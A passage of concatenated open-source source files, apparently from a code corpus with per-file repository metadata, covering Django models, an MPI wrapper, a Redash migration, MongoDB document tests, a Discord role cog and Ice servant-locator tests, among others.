sS'docStringFormat'
p67
S'StructuredText'
p68
ssg39
g5
sg40
g6
sg41
S''
sbt. | mads-bertelsen/McCode | meta-pkgs/windows/Support/gnuplot-py-1.8/.happydoc.utils.py | Python | gpl-2.0 | 1,337 |
"""
Comments may be attached to any object. See the comment documentation for
more information.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Author(models.Model):
    # Name parts combined into "First Last" by __str__.
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=30)
    def __str__(self):
        """Return the author's full display name."""
        return '%s %s' % (self.first_name, self.last_name)
@python_2_unicode_compatible
class Article(models.Model):
    # NOTE: positional ForeignKey without on_delete — legacy Django style
    # (on_delete became mandatory in Django 2.0).
    author = models.ForeignKey(Author)
    headline = models.CharField(max_length=100)
    def __str__(self):
        """Return the article headline."""
        return self.headline
@python_2_unicode_compatible
class Entry(models.Model):
    title = models.CharField(max_length=250)
    body = models.TextField()
    pub_date = models.DateField()
    # Per-entry switch for attaching comments (see module docstring).
    enable_comments = models.BooleanField(default=False)
    def __str__(self):
        """Return the entry title."""
        return self.title
class Book(models.Model):
    # Unusual: the Dewey decimal classification (e.g. 123.45) doubles as
    # the primary key, hence the DecimalField with primary_key=True.
    dewey_decimal = models.DecimalField(primary_key=True, decimal_places=2, max_digits=5)
| DanteOnline/free-art | venv/lib/python3.4/site-packages/tests/testapp/models.py | Python | gpl-3.0 | 1,064 |
# coding:utf-8
'''
Created on 2017/12/20.
@author: chk01
'''
from practice_one.Company.load_material.utils import *
org = 'nose'
def get_point_feature():
    """Build the (12, 6, 2) nose-landmark feature matrix for the 12 cartoon
    nose models and save it, with the model ids, to a .mat file.

    Rows are indexed by model id (filename stem); cells left at the
    999 sentinel mean the corresponding model file was missing.
    """
    # Progress message (Chinese): "start importing <org>".
    print('开始{}导入'.format(org))
    dir_path = os.listdir('material/cartoon/nose/model')
    m = 12
    n = 6
    # Sentinel-filled outputs: X holds n 2-D points per model, Y the ids.
    X = np.zeros([m, n, 2]) + 999
    Y = np.zeros([m, 1]) + 999
    for i, sourceDir in enumerate(dir_path):
        # Model id comes from the filename stem, e.g. '3.png' -> 3.
        _id = int(sourceDir.split('.')[0])
        full_path = 'material/cartoon/nose/model/' + sourceDir
        # presumably returns the 72-point face landmark set — TODO confirm
        # against load_material.utils.get_baseInfo.
        landmark72, _, _, _, _ = get_baseInfo(full_path)
        landmark72 = landmark72_trans(landmark72)
        feature = point2feature_nose(landmark72)
        X[_id - 1] = feature
        Y[_id - 1] = _id
        # Progress message (Chinese): "loaded <org> image <id>".
        print('load--->{}---图{}'.format(org, _id))
    scio.savemat('material/feature_matrix/nose', {"X": X, "Y": Y})
    # Progress message (Chinese): "finished importing <org>".
    print('完成{}导入'.format(org))
if __name__ == '__main__':
    get_point_feature()
| sunyihuan326/DeltaLab | shuwei_fengge/practice_one/Company/download/nose_check.py | Python | mit | 916 |
"""
MMPI - MPI Interface for Python
Copyright (C) 2005 Michael Steder(steder@gmail.com)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
"""
request.py
Defines a Request object and overloads asynchronous I/O
methods that normally return integer request handles to
instead return Request objects.
Request objects have a __int__ method to automatically
convert them back to integer handles for use with
_mpi functions.
"""
import core
def test( request ):
"""
ready = test( request )
if ( test( request )):
print 'Non-blocking send or receive operation is complete!'
Note that the request object is no longer valid after this call
returns successfully and the operation is complete.
"""
#raise NotImplementedError,"test has not yet been implemented"
# Invalid Request ID's (ID's for Sends/Recvs that have completed)
# will cause a crash if they are passed directly to core.mpi_test.
return request.test()
def wait( request ):
    """Block until the non-blocking operation behind 'request' completes.

    Returns the operation's status.  The Request object guards its own
    validity, so calling wait() on an already-completed request is safe
    (unlike passing a stale raw handle to the core layer).
    """
    return request.wait()
def isend( buffer, count, datatype, destination, tag, comm ):
    """Start a non-blocking send and return a Request handle for it.

    Sends 'count' elements of type 'datatype' from 'buffer' to rank
    'destination' in communicator 'comm', tagged with 'tag'.  The send
    is only started here; use test(request) to poll for completion or
    wait(request) to block until the data has been handed off.
    """
    handle = core.isend( buffer, count, datatype, destination, tag, comm )
    return Request( "send", handle, buffer, count, datatype, destination, tag, comm )
def irecv( count, datatype, source, tag, comm ):
    """Start a non-blocking receive; return (request, buffer).

    Posts a receive for 'count' elements of type 'datatype' from rank
    'source' in communicator 'comm' with tag 'tag'.  'buffer' holds
    undefined contents until the operation completes — call
    test(request) or wait(request) before reading it.
    """
    handle, buffer = core.irecv( count, datatype, source, tag, comm )
    request = Request( "recv", handle, buffer, count, datatype, source, tag, comm )
    return request, buffer
class Request:
    """Handle for a pending non-blocking send or receive.

    Couples the low-level integer request id with the buffer, count,
    datatype, peer rank, tag and communicator of the operation.  Poll
    with test(), block with wait(); int(request) yields the raw handle
    for use with the _mpi functions.  The object tracks whether the
    underlying handle is still valid, because passing a completed
    handle back to the core layer would crash.
    """

    def __init__(self, type, id, buffer, count, datatype, source_or_destination, tag, comm ):
        """Build a request handle.  Used internally by isend()/irecv();
        user code should never construct one directly."""
        self.type = type                      # "send" or "recv"
        self.id = id                          # low-level request handle
        self.buffer = buffer
        self.count = count
        self.datatype = datatype
        self.target = source_or_destination   # destination for sends, source for recvs
        self.tag = tag
        self.comm = comm
        self.valid = True                     # False once the operation completes
        self.status = None                    # status captured by wait()

    def __int__(self):
        # Raw handle, for interoperability with the low-level _mpi calls.
        return self.id

    def test(self):
        """Return True once the send/recv has completed (non-blocking)."""
        # A completed request must never be handed back to core.test():
        # the handle is no longer valid and would crash the C layer.
        if not self.valid:
            return True
        if core.test(self.id):
            self.valid = False
            return True
        return False

    def wait(self):
        """Block until the operation completes; return its status."""
        # Same caveat as test(): only pass still-valid handles down.
        if self.valid:
            self.status = core.wait(self.id)
        return self.status

    def __repr__(self):
        return self.__str__()

    def __str__(self):
        validity = "valid" if self.valid else "invalid"
        target = "destination" if self.type == 'send' else "source"
        return "< %s %s request#: %s, count: %s, datatype: %s, %s: %s, tag: %s, comm: %s >" % ( validity, self.type, self.id, self.count, self.datatype, target, self.target, self.tag, self.comm )
| steder/maroonmpi | lib/request.py | Python | gpl-2.0 | 8,768 |
#Evaluate semantic space against MEN dataset
import sys
import utils
from scipy import stats
import numpy as np
from math import sqrt
def spearman(x, y):
    """Spearman rank correlation of x and y.

    Thin wrapper over scipy.stats.spearmanr returning only the
    correlation coefficient (scipy applies no tie adjustment here).
    """
    rho, _pvalue = stats.spearmanr(x, y)
    return rho
def readMEN(annotation_file):
    """Read a MEN-style annotation file.

    Each line holds 'word1 word2 score' separated by whitespace.

    :param annotation_file: path to the annotation file
    :return: (pairs, humans) where pairs is a list of (word1, word2)
        tuples and humans the parallel list of float scores
    :raises IOError: if the file cannot be opened
    :raises ValueError/IndexError: on malformed lines
    """
    pairs = []
    humans = []
    # 'with' guarantees the handle is closed even if a line is malformed
    # (the original open()/close() pair leaked the handle on exceptions).
    with open(annotation_file, 'r') as f:
        for line in f:
            items = line.rstrip('\n').split()
            pairs.append((items[0], items[1]))
            humans.append(float(items[2]))
    return pairs, humans
def compute_men_spearman(dm_dict, annotation_file):
    """Evaluate a semantic space against a MEN-style annotation file.

    For every annotated word pair whose two words both exist in the
    space, compute the cosine similarity of their vectors and correlate
    those similarities with the human judgements.

    :param dm_dict: mapping word -> vector (the semantic space)
    :param annotation_file: path to the MEN annotation file
    :return: (spearman_rho, count) where count is the number of pairs
        actually evaluated (pairs with OOV words are skipped)
    """
    pairs, humans = readMEN(annotation_file)
    system_actual = []
    human_actual = []
    # Iterate pairs and scores in lockstep instead of indexing by range(len()).
    for (a, b), human in zip(pairs, humans):
        if a in dm_dict and b in dm_dict:
            system_actual.append(utils.cosine_similarity(dm_dict[a], dm_dict[b]))
            human_actual.append(human)
    sp = spearman(human_actual, system_actual)
    # The number of evaluated pairs is just the length of the collected list.
    return sp, len(system_actual)
| minimalparts/Tutorials | FruitFly/MEN.py | Python | mit | 989 |
#!/usr/bin/python
#
# Copyright (c) SAS Institute, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
from _scriptsetup import mirrorballDir
from updatebot import config
from updatebot import current
def usage():
    """Print command usage and terminate with a non-zero exit status."""
    print 'usage: %s <platform>' % sys.argv[0]
    sys.exit(1)
# NOTE(review): sys.argv[1] is read before the argument count is checked,
# so running with no arguments raises IndexError instead of showing usage().
platform = sys.argv[1]
# The platform must name one of the config directories shipped with mirrorball.
if platform not in os.listdir(mirrorballDir + '/config'):
    usage()
# Optional second argument: a restore file (currently unused below).
restoreFile=None
if len(sys.argv) > 2:
    restoreFile = sys.argv[2]
confDir = mirrorballDir + '/config/' + platform
# Load the bot configuration for the selected platform and build the groups.
cfg = config.UpdateBotConfig()
cfg.read(confDir + '/updatebotrc')
bot = current.Bot(cfg)
pkgMap = bot.buildgroups()
#import epdb; epdb.st()
| sassoftware/mirrorball | scripts/current_buildgroup.py | Python | apache-2.0 | 1,164 |
from . import test_sale_order_mass_action
| OCA/sale-workflow | sale_order_mass_action/tests/__init__.py | Python | agpl-3.0 | 42 |
import json
import jsonschema
from jsonschema import ValidationError
from redash import query_runner
from redash.models import DataSource
def validate_configuration(query_runner_type, configuration_json):
    """Return True if the options are valid for the given query runner type.

    configuration_json may be a JSON string or an already-parsed mapping;
    it is validated against the runner's JSON schema.  Unknown runner
    types, unparsable JSON and schema violations all yield False.
    """
    query_runner_class = query_runner.query_runners.get(query_runner_type, None)
    if query_runner_class is None:
        return False
    try:
        # Accept either a raw JSON string or a pre-parsed structure.
        # (basestring: this migration script is Python 2 code.)
        if isinstance(configuration_json, basestring):
            configuration = json.loads(configuration_json)
        else:
            configuration = configuration_json
        jsonschema.validate(configuration, query_runner_class.configuration_schema())
    except (ValidationError, ValueError):
        return False
    return True
def update(data_source):
    """Migrate one data source's legacy options string to the JSON format.

    Each data source type stored its options in a different ad-hoc string
    format; this converts them to the JSON configuration that the current
    query runners validate against, then saves the row.  Sources whose
    options already validate are left untouched.
    """
    print "[%s] Old options: %s" % (data_source.name, data_source.options)
    if validate_configuration(data_source.type, data_source.options):
        print "[%s] configuration already valid. skipping." % data_source.name
        return
    if data_source.type == 'pg':
        # Legacy format: space-separated "key=value" pairs (libpq style).
        values = data_source.options.split(" ")
        configuration = {}
        for value in values:
            k, v = value.split("=", 1)
            configuration[k] = v
            # 'port' must be numeric in the new schema.
            if k == 'port':
                configuration[k] = int(v)
        data_source.options = json.dumps(configuration)
    elif data_source.type == 'mysql':
        # Legacy format: ";"-separated "Key=value" pairs with ODBC-style names.
        mapping = {
            'Server': 'host',
            'User': 'user',
            'Pwd': 'passwd',
            'Database': 'db'
        }
        values = data_source.options.split(";")
        configuration = {}
        for value in values:
            k, v = value.split("=", 1)
            configuration[mapping[k]] = v
        data_source.options = json.dumps(configuration)
    elif data_source.type == 'graphite':
        # Already JSON, but only a subset of keys carries over.
        old_config = json.loads(data_source.options)
        configuration = {
            "url": old_config["url"]
        }
        if "verify" in old_config:
            configuration['verify'] = old_config['verify']
        if "auth" in old_config:
            # auth was stored as a (username, password) pair.
            configuration['username'], configuration['password'] = old_config["auth"]
        data_source.options = json.dumps(configuration)
    elif data_source.type == 'url':
        # Options were the bare URL string.
        data_source.options = json.dumps({"url": data_source.options})
    elif data_source.type == 'script':
        # Options were the bare script path.
        data_source.options = json.dumps({"path": data_source.options})
    elif data_source.type == 'mongo':
        # Type rename only; options format is unchanged here.
        data_source.type = 'mongodb'
    else:
        print "[%s] No need to convert type of: %s" % (data_source.name, data_source.type)
    print "[%s] New options: %s" % (data_source.name, data_source.options)
    data_source.save(only=data_source.dirty_fields)
if __name__ == '__main__':
    # Migrate every stored data source's legacy options to the JSON format.
    for data_source in DataSource.select(DataSource.id, DataSource.name, DataSource.type, DataSource.options):
        update(data_source)
| imsally/redash | old_migrations/0003_update_data_source_config.py | Python | bsd-2-clause | 2,861 |
from thywill_server.component import Component
from thywill_server.settings import THYWILL_CONFIG
class PushComponent(Component):
    """Base class for push component implementations.

    The concrete backend is chosen from THYWILL_CONFIG['push']['component']
    and shared process-wide via the factory() accessor.  Subclasses must
    implement __init__, push_to_client and wrap_push_message.
    """

    singleton = None

    @staticmethod
    def factory():
        """Return the shared push component, creating it on first use."""
        if not PushComponent.singleton:
            backend = THYWILL_CONFIG['push']['component']
            if backend == 'orbited stomp':
                # Imported lazily so unused backends carry no import cost.
                from thywill_server.push.orbited_stomp.component import OrbitedStompComponent
                PushComponent.singleton = OrbitedStompComponent(THYWILL_CONFIG['push'])
            else:
                raise NotImplementedError('No implementation for receive = ' + backend)
        return PushComponent.singleton

    def __init__(self, config):
        """Abstract: subclasses construct themselves from a configuration dict.

        :Parameters:
            - config: a dictionary of configuration information
        """
        raise NotImplementedError()

    def push_raw_message_to_client(self, uuid, raw_message):
        """Wrap raw_message via wrap_push_message() and push it to uuid.

        Convenience shorthand for
        push_to_client(uuid, self.wrap_push_message(raw_message)).
        """
        message = self.wrap_push_message(raw_message)
        self.push_to_client(uuid, message)

    def push_to_client(self, uuid, message):
        """Abstract: deliver a PushMessage to the client identified by uuid.

        :Parameters:
            - uuid: the unique client identifier
            - message: a PushMessage object
        """
        raise NotImplementedError()

    def wrap_push_message(self, raw_message):
        """Abstract: wrap raw_message into the PushMessage object that
        push_to_client() expects, and return it."""
        raise NotImplementedError()
| exratione/thywill-python | thywill_server/src/thywill_server/push/push_component.py | Python | mit | 1,998 |
# -*- coding: utf-8 -*-
#
# Monk is an unobtrusive data modeling, manipulation and validation library.
# Copyright © 2011—2015 Andrey Mikhaylenko
#
# This file is part of Monk.
#
# Monk is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Monk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Monk. If not, see <http://gnu.org/licenses/>.
"""
MongoDB integration tests
~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import datetime
import pymongo
import pytest
from bson import DBRef, ObjectId
from monk import mongo
from monk import nullable, ValidationError
from monk.compat import text_type as t
class TestDocumentModel:
    """Unit tests for monk.mongo.Document: structure defaults, dot-expanded
    access and callable defaults (no database required)."""

    class Entry(mongo.Document):
        # Schema: required text title, nested author dict, and a list of
        # comment dicts whose 'is_spam' flag defaults to False.
        structure = {
            'title': t,
            'author': {
                'first_name': t,
                'last_name': t,
            },
            'comments': [
                {
                    'text': t,
                    'is_spam': False,
                },
            ]
        }
    # Shared fixture data matching the Entry structure above.
    data = {
        'title': t('Hello'),
        'author': {
            'first_name': t('John'),
            'last_name': t('Doe'),
        },
        'comments': [
            # XXX when do we add the default value is_spam=False?
            # anything that is inside a list (0..n) cannot be included in skel.
            # (just check or also append defaults) on (add / save / validate)?
            {'text': t('Oh hi')},
            {'text': t('Hi there'), 'is_spam': True},
        ],
        'views_cnt': 0,
    }
    def test_basic_document(self):
        """Item access works; missing keys raise KeyError."""
        entry = self.Entry(self.data)
        assert entry['title'] == self.data['title']
        with pytest.raises(KeyError):
            entry['nonexistent_key']
    def test_dot_expanded(self):
        """Attribute access mirrors item access, including nested dicts
        and dicts inside lists, for both reads and writes."""
        entry = self.Entry(self.data)
        # getattr -> getitem
        assert entry['title'] == self.data['title']
        assert entry['title'] == entry.title
        with pytest.raises(AttributeError):
            entry.nonexistent_key
        assert entry['author']['first_name'] == entry.author.first_name
        # setattr -> setitem
        entry.title = t('Bye!')
        assert entry.title == t('Bye!')
        assert entry.title == entry['title']
        entry.author.first_name = t('Joan')
        assert entry.author.first_name == t('Joan')
        assert entry.author.first_name == entry['author']['first_name']
        assert entry.comments[0].text == entry['comments'][0]['text']
    def test_defaults(self):
        """Scalar defaults from the structure are filled in."""
        entry = self.Entry(self.data)
        assert entry.views_cnt == 0
    def test_defaults_dict_in_list(self):
        """Defaults are also applied to dicts nested inside lists."""
        entry = self.Entry(self.data)
        assert entry.comments[0].is_spam == False
    def test_callable_defaults_builtin_func(self):
        """A callable default (builtin) supplies the value and its return
        type is enforced during validation."""
        class Event(mongo.Document):
            structure = {
                'time': datetime.datetime.utcnow,
            }
        event = Event(time=datetime.datetime.utcnow())
        event.validate()
        assert isinstance(event.time, datetime.datetime)
        event = Event()
        event.validate()
        assert isinstance(event.time, datetime.datetime)
        # date is not a datetime, so validation must reject it.
        with pytest.raises(ValidationError):
            event = Event(time=datetime.date.today())
            event.validate()
    def test_callable_defaults_custom_func(self):
        """Same as above but with a user-supplied lambda default."""
        class Event(mongo.Document):
            structure = {
                'text': lambda: t('hello')
            }
        event = Event(text=t('albatross'))
        event.validate()
        assert isinstance(event.text, t)
        assert event.text == t('albatross')
        event = Event()
        event.validate()
        assert isinstance(event.text, t)
        assert event.text == t('hello')
        with pytest.raises(ValidationError):
            event = Event(text=123)
            event.validate()
    def test_callable_defaults_custom_func_nested(self):
        """Callable defaults must also work inside nested structures."""
        # Issue #1 https://bitbucket.org/neithere/monk/issue/1/callable-defaults-in-nested-structures
        class Event(mongo.Document):
            structure = {
                'content': {
                    'text': lambda: t('hello')
                }
            }
        event = Event(content=dict(text=t('albatross')))
        event.validate()
        assert isinstance(event.content.text, t)
        assert event.content.text == t('albatross')
        event = Event()
        event.validate()
        assert isinstance(event.content.text, t)
        assert event.content.text == t('hello')
        with pytest.raises(ValidationError):
            event = Event(content=dict(text=123))
            event.validate()
class TestMongo:
    """Integration tests for monk.mongo.Document persistence.

    Requires a MongoDB server reachable on localhost; each test starts
    from a dropped collection.
    NOTE(review): this code uses pymongo 2.x-era APIs (collection.insert,
    cursor.count) and a `pytest.raises_regexp` helper — confirm the pinned
    dependency versions before modernising.
    """
    DATABASE = 'test_monk'
    class Entry(mongo.Document):
        collection = 'entries'
        structure = {
            '_id': nullable(ObjectId),
            'title': t,
        }
    def setup_method(self, method):
        # Fresh collection per test: connect and drop any leftovers.
        self.db = pymongo.MongoClient()[self.DATABASE]
        self.collection = self.db[self.Entry.collection]
        self.collection.drop()
    def test_query(self):
        """find() wraps raw documents from the collection."""
        self.collection.insert({'title': t('Hello world!')})
        entries = self.Entry.find(self.db, {'title': t('Hello world!')})
        assert entries.count() == 1
        entry = entries[0]
        assert entry.title == t('Hello world!')
    def test_insert(self):
        """save() inserts a new raw document."""
        entry = self.Entry(title=t('Hello'))
        entry.save(self.db)
        assert self.collection.find().count() == 1
        assert self.collection.find({'title': t('Hello')}).count() == 1
    def test_remove(self):
        """remove() deletes the backing document."""
        self.collection.insert({'title': t('Hello')})
        entries = self.Entry.find(self.db)
        assert entries.count() == 1
        entry = entries[0]
        entry.remove(self.db)
        entries = self.Entry.find(self.db)
        assert entries.count() == 0
    def test_id(self):
        """_id is assigned on first save and reused on update."""
        entry = self.Entry(title=t('Hello'))
        assert entry['_id'] is None
        assert entry.get_id() is None
        # save the first time
        obj_id = entry.save(self.db)
        assert obj_id == entry['_id']
        assert self.Entry.find(self.db).count() == 1
        assert [entry] == list(self.Entry.find(self.db, {'_id': obj_id}))
        # update
        entry.title = t('Bye')
        same_id = entry.save(self.db)
        assert obj_id == same_id
        assert obj_id == entry['_id']
        assert obj_id == entry.get_id()
        assert self.Entry.find(self.db).count() == 1
    def test_get_ref(self):
        """get_ref() yields a DBRef once the document has been saved."""
        entry = self.Entry(title=t('Hello'))
        assert entry.get_ref() is None
        entry.save(self.db)
        assert entry.get_ref() == DBRef(self.Entry.collection, entry.get_id())
    def test_result_set_ids(self):
        """ResultSet.ids() matches collecting get_id() manually."""
        self.collection.insert({'title': t('Foo')})
        self.collection.insert({'title': t('Bar')})
        results = self.Entry.find(self.db)
        ids_manual = [x.get_id() for x in results]
        # new object because caching is not supported
        ids = self.Entry.find(self.db).ids()
        assert ids_manual == list(ids)
    def test_equality(self):
        """Documents are equal if all these conditions are met:

        * both inherit to the same class;
        * both are stored in the same collection;
        * both have assigned ids and ids are equal.
        """
        a = self.Entry(title=t('Hello'))
        b = self.Entry(title=t('Hello'))
        assert a != b
        a.save(self.db)
        assert a != b
        c = self.Entry.get_one(self.db)
        assert a == c
        b.save(self.db)
        assert a != b
        d = dict(title=t('Hello'))
        assert a != d
        class E(mongo.Document):
            structure = self.Entry.structure
        e = E(title=t('Hello'))
        assert a != e
        class F(mongo.Document):
            collection = 'comments'
            structure = self.Entry.structure
        e = F(title=t('Hello'))
        e.save(self.db)
        assert a != e
    def test_index_id(self):
        "Index for _id is created on first save to a collection"
        with pytest.raises_regexp(pymongo.errors.OperationFailure, 'no collection'):
            self.collection.index_information()
        self.Entry(title=t('entry')).save(self.db)
        assert '_id_' in self.collection.index_information()
    def test_index_custom(self):
        # Custom indexes declared on the class are created on save too.
        "Index for _id is created on first save to a collection"
        with pytest.raises_regexp(pymongo.errors.OperationFailure, 'no collection'):
            self.collection.index_information()
        class IndexedEntry(self.Entry):
            indexes = {'title': None}
        IndexedEntry(title=t('Hello')).save(self.db)
        assert 'title_1' in self.collection.index_information()
| neithere/monk | tests/mongo_tests.py | Python | gpl-3.0 | 9,121 |
# selection sort algorithm
# complexity is O(len(L)^2)
def iterSelectSort(L):
    """Sort list L in place in ascending order via selection sort; return L.

    For each position i, find the index of the smallest remaining element
    and swap it into place.  O(len(L)^2) comparisons, O(1) extra space.
    Empty and single-element lists are returned unchanged (the outer loop
    body never runs).
    """
    for i in range(len(L) - 1):
        # Locate the smallest element of L[i:]; tracking only the index
        # avoids the original's redundant parallel minVal bookkeeping.
        min_index = i
        for j in range(i + 1, len(L)):
            if L[j] < L[min_index]:
                min_index = j
        # Idiomatic tuple swap replaces the temp-variable shuffle.
        L[i], L[min_index] = L[min_index], L[i]
    return L
from agagd_core.models import Member
from agagd_core.tables.search import SearchResultsTable
from django.db.models import F, Q
from django.http import HttpResponseRedirect
from django.template.response import TemplateResponse
from django.urls import reverse
from django.views.generic import DetailView
from django_tables2 import RequestConfig
class SearchView(DetailView):
    """Member search: numeric queries redirect to a player profile,
    textual queries render a paginated table of matching members."""

    template_name = "search_page.html"
    search_results_template_name = "search_results.html"

    def get(self, request):
        """Handle GET ?q=...; empty queries re-render the search page."""
        query = request.GET.get("q", "")
        if not query:
            return TemplateResponse(request, self.template_name)
        # An all-digit query is treated as an AGA member id.
        if query.isdigit():
            member_id = [int(query)]
            return HttpResponseRedirect(reverse("players_profile", args=member_id))
        member_table_data = (
            Member.objects.filter(Q(member_id=F("players__pin_player")))
            .filter(full_name__icontains=query)
            .values(
                "member_id",
                "chapter_id",
                "renewal_due",
                "state",
                "players__rating",
                "country",
                "full_name",
                "family_name",
            )
            .order_by("family_name")
        )
        self.template_name = self.search_results_template_name
        member_results_table = SearchResultsTable(member_table_data)
        RequestConfig(request, paginate={"per_page": 25}).configure(
            member_results_table
        )
        # Explicit context instead of the previous `context = locals()`,
        # which leaked self/request/queryset internals into the template.
        # NOTE(review): confirm the results template references no other
        # local names than these.
        context = {
            "query": query,
            "search_query": query,
            "member_results_table": member_results_table,
        }
        return TemplateResponse(request, self.template_name, context)
| usgo/agagd | agagd/agagd_core/views/search.py | Python | mit | 1,698 |
import discord
import os
from discord.ext import commands
from collections import defaultdict
from .utils.dataIO import dataIO
from .utils import checks
# Per-server default settings: 'sticky_roles' holds role ids to reapply on
# join; 'to_reapply' maps member id -> role ids captured when they left.
default = {
    "sticky_roles": [],
    "to_reapply" : {}
}
class StickyRoles:
    """Reapplies specific roles on join"""

    def __init__(self, bot):
        self.bot = bot
        db = dataIO.load_json("data/stickyroles/stickyroles.json")
        # defaultdict so unknown server ids get a fresh copy of `default`.
        self.db = defaultdict(lambda: default.copy(), db)
    @commands.group(pass_context=True, aliases=["stickyrole"])
    @checks.serverowner()
    async def stickyroles(self, ctx):
        """Adds / removes roles to be reapplied on join"""
        if ctx.invoked_subcommand is None:
            await self.bot.send_cmd_help(ctx)
    @stickyroles.command(pass_context=True)
    async def add(self, ctx, *, role: discord.Role):
        """Adds role to be reapplied on join"""
        server = ctx.message.server
        # The bot can only grant roles below its own highest role.
        if not server.me.top_role.position > role.position:
            await self.bot.say("I don't have enough permissions to add that "
                               "role. Remember to take role hierarchy in "
                               "consideration.")
            return
        self.db[server.id]["sticky_roles"].append(role.id)
        self.save()
        await self.bot.say("That role will now be reapplied on join.")
    @stickyroles.command(pass_context=True)
    async def remove(self, ctx, *, role: discord.Role):
        """Removes role to be reapplied on join"""
        server = ctx.message.server
        try:
            self.db[server.id]["sticky_roles"].remove(role.id)
        except ValueError:
            await self.bot.say("That role was never added in the first place.")
        else:
            self.save()
            await self.bot.say("That role won't be reapplied on join.")
    @stickyroles.command(pass_context=True)
    async def clear(self, ctx):
        """Removes all sticky roles"""
        server = ctx.message.server
        try:
            # Drops both the sticky role list and any pending reapplications.
            del self.db[server.id]
        except KeyError:
            pass
        self.save()
        await self.bot.say("All sticky roles have been removed.")
    @stickyroles.command(name="list", pass_context=True)
    async def _list(self, ctx):
        """Lists sticky roles"""
        server = ctx.message.server
        roles = self.db[server.id].get("sticky_roles", [])
        # Resolve ids to role objects, silently skipping deleted roles.
        roles = [discord.utils.get(server.roles, id=r) for r in roles]
        roles = [r.name for r in roles if r is not None]
        if roles:
            await self.bot.say("Sticky roles:\n\n" + ", ".join(roles))
        else:
            await self.bot.say("No sticky roles. Add some with `{}stickyroles "
                               "add`".format(ctx.prefix))
    async def on_member_remove(self, member):
        # Event hook: remember which sticky roles the leaving member had
        # so they can be restored if they rejoin.
        server = member.server
        if server.id not in self.db:
            return
        save = False
        settings = self.db[server.id]
        for role in member.roles:
            if role.id in settings["sticky_roles"]:
                if member.id not in settings["to_reapply"]:
                    settings["to_reapply"][member.id] = []
                settings["to_reapply"][member.id].append(role.id)
                save = True
        if save:
            self.save()
    async def on_member_join(self, member):
        # Event hook: restore previously captured sticky roles on rejoin.
        server = member.server
        if server.id not in self.db:
            return
        settings = self.db[server.id]
        if member.id not in settings["to_reapply"]:
            return
        to_add = []
        for role_id in settings["to_reapply"][member.id]:
            # Skip roles that were un-stickied while the member was gone.
            if role_id not in settings["sticky_roles"]:
                continue
            role = discord.utils.get(server.roles, id=role_id)
            if role:
                to_add.append(role)
        del settings["to_reapply"][member.id]
        if to_add:
            try:
                await self.bot.add_roles(member, *to_add)
            except discord.Forbidden:
                print("Failed to add roles to {} ({})\n{}\n"
                      "I lack permissions to do that."
                      "".format(member, member.id, to_add))
            except discord.HTTPException as e:
                print("Failed to add roles to {} ({})\n{}\n"
                      "{}"
                      "".format(member, member.id, to_add, e))
        self.save()
    def save(self):
        # Persist the whole settings mapping to disk.
        dataIO.save_json("data/stickyroles/stickyroles.json", self.db)
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import os, sys, traceback, time
import Ice, Test
def test(b):
if not b:
raise RuntimeError('test assertion failed')
class TestI(Test.TestIntf):
    """Servant used by the servant-locator tests.

    Most operations are deliberately empty: the exceptions under test are
    raised by the locator's locate()/finished() hooks, not by the servant.
    """

    def requestFailedException(self, current=None):
        pass
    def unknownUserException(self, current=None):
        pass
    def unknownLocalException(self, current=None):
        pass
    def unknownException(self, current=None):
        pass
    def localException(self, current=None):
        pass
    def userException(self, current=None):
        pass
    def pythonException(self, current=None):
        pass
    def unknownExceptionWithServantException(self, current=None):
        # The servant itself raises here; the locator decides how it surfaces.
        raise Ice.ObjectNotExistException()
    def impossibleException(self, throw, current=None):
        if throw:
            raise Test.TestImpossibleException()
        #
        # Return a value so we can be sure that the stream position
        # is reset correctly if finished() throws.
        #
        return "Hello"
    def intfUserException(self, throw, current=None):
        if throw:
            raise Test.TestIntfUserException()
        #
        # Return a value so we can be sure that the stream position
        # is reset correctly if finished() throws.
        #
        return "Hello"
    def asyncResponse(self, current=None):
        #
        # Only relevant for AMD.
        #
        pass
    def asyncException(self, current=None):
        #
        # Only relevant for AMD.
        #
        pass
    def shutdown(self, current=None):
        # Stops the adapter so the test driver can finish.
        current.adapter.deactivate()
class CookieI(Test.Cookie):
    # Cookie passed from locate() to finished(); the locator asserts on
    # this exact message to verify the cookie round-trip.
    def message(self):
        return 'blahblah'
class ServantLocatorI(Ice.ServantLocator):
    """Servant locator under test.

    Tracks deactivation and the current request id to assert that
    locate()/finished() are each invoked exactly once per request, and
    raises a dispatch-specific exception depending on the operation name.
    """

    def __init__(self, category):
        self._deactivated = False
        self._category = category
        # Request id of the in-flight request; -1 means none pending.
        self._requestId = -1
    def __del__(self):
        # The adapter must have deactivated the locator before teardown.
        test(self._deactivated)
    def locate(self, current):
        test(not self._deactivated)
        test(current.id.category == self._category or self._category == "")
        # "unknown" simulates a missing servant.
        if current.id.name == "unknown":
            return None
        test(current.id.name == "locate" or current.id.name == "finished")
        # Object name "locate" means: throw from locate() itself.
